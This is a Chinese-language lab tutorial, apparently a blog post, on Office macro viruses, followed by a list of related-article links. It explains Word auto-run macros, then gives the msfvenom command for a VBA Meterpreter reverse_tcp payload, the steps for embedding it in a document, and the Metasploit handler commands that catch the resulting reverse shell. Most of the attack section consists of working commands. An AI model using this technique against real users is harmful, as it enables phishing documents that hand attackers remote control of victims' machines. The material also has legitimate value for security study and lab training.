office宏病毒反弹shell实验
0x00 什么是宏病毒
宏病毒就是Word中被嵌入的带有恶意行为的宏代码(VBA代码),当打开带有宏病毒的word文档时,嵌入其中的宏代码会自动运行
Word 将下列名称识别为自动宏,或称“auto”宏,当相应动作被执行,会自动调用满足条件的VBA代码。
AutoExec:启动 Word 或加载全局模板时AutoNew:每次新建文档时AutoOpen:每次打开已有文档时AutoClose:每次关闭文档时
0x01 简单实验环境搭建
本次实验的环境为:
win_10
word_2013
VM_kali_linux_2018(桥接模式)
首先在电脑中word信任中心设置中,打开启动所有宏
选项,并信任对VBA工程对象模型的访问,以便更好的查看实验效果。
在开发者工具中选中宏,编辑宏名称和宏位置后点击创建,进入VBA代码编辑界面。
0x02实验开始
准备工作完成后,在kali中使用msfvenom生成一个vba类型的后门msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.169 LPORT=6666 -f vba -o test.vba
将vba文件中的代码复制入刚刚的代码编辑界面,并保存。
查看windows主机的ip地址
在msf中设置本机监听:
use exploit/multi/handler #选泽监听模块
set payload windows/meterpreter/reverse_tcp #选择生成木马相同的类型
set LHOST 192.168.1.169 #设置本机ip监听
set LPORT 6666 # 设置本机监听端口
exploit #执行监听
当windows中打开我们生成的test.docx时,msf中接收到了来自192.168.1.249的连接。
office宏病毒反弹shell实验相关推荐
- centos7输入shell找不到命令_反弹shell原理与实现
什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与tel ...
- Windows下反弹shell的方法
1.powercat反弹shell powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powers ...
- 反弹Shell具体实现
文章目录 啥是反弹Shell 反弹Shell实验 结语 啥是反弹Shell 反弹shell(reverseshell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入 ...
- CS制作office宏病毒钓鱼
一.实验目的 1. 利用CobaltStrile生成word宏病毒的钓鱼payload,实现远程控制对方主机 二.实验器材 1.vmware 15.5 2.kali linux 3.cobaltstr ...
- java Runtime.getRuntime().exec 获取反弹shell
说明 前面写了一篇在Java环境下获取shell的文章.当时使用的语句是: Runtime r = Runtime.getRuntime(); Process p = r.exec(new Strin ...
- linux下几种反弹Shell方法的总结与理解
实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹shell命令如下: bash -i >& /dev/tcp/ip/port ...
- linux 反弹shell(二)反弹shell的本质
0X00 前言 在上一篇文章 Linux反弹shell(一)文件描述符与重定向,我们已经讨论过了反弹shell中最核心也是相对较难理解的部分,那么接下来我们就可以正式借反弹shell的实例分析回顾前一 ...
- [网络安全自学篇] 五十八.Windows安全缺陷利用之再看CVE-2019-0708及反弹shell防御措施
很早之前,我分享过一篇名叫 "四十四.Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解" 的博客,主要采用Python代码让目标XP系统蓝屏.当时也阅读了很多 ...
- [网络安全自学篇] 五十三.Windows系统安全之Metasploit实现栈溢出攻击及反弹shell原理解析
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了虚拟机基础知识,包括XP操作系统安装.文件共享设置.网络快照及网络设置 ...
- cmd管道无法接收特定程序返回值_渗透不会反弹shell?来教你写一个cmd的shell
渗透不会反弹shell?来教你写一个cmd的shell 包含的库: #include #include #include #include #include #pragma comment(lib, ...
最新文章
- 树莓派gparted启动失败解决方法
- 51nod 1250 排列与交换——dp
- 推荐笔记本用户使用的硬盘。。。2.5”战胜台式机硬盘 日立7K320-250GB
- 今天的我也不太清楚的即时通讯
- dvd在线租赁问题 matlab,DVD在线租赁问题.doc
- LEBERT:基于词汇增强的中文NER模型
- 由公式抽样检查所想到的...
- 投资理财书籍推荐 理财书籍排行榜前十
- 我的android手机在哪里打开,USB调试在哪里打开 手机USB调试模式设置大全
- TP-LINK配置无线上网短信Wifi认证方式
- 【Uly】微软产品开发中的“战争与和平”
- MapReducer的map和reducer的几种写法模板以及自定义数据类型
- pandas绘图线条颜色大全
- 通知与服务——服务Service——服务的绑定与解绑延迟绑定服务与解绑服务
- surface pro 7 使用type c耳机问题
- Excel 拆分 分割 数据 (对数据进行分列)
- 看井上雄彦是如何作画的!
- 创客学院 level1第二节学习完成
- 用晨曦记账本,设置多功能打印账目
- 洞若观火 - 让ZONE做你数据库运维的眼睛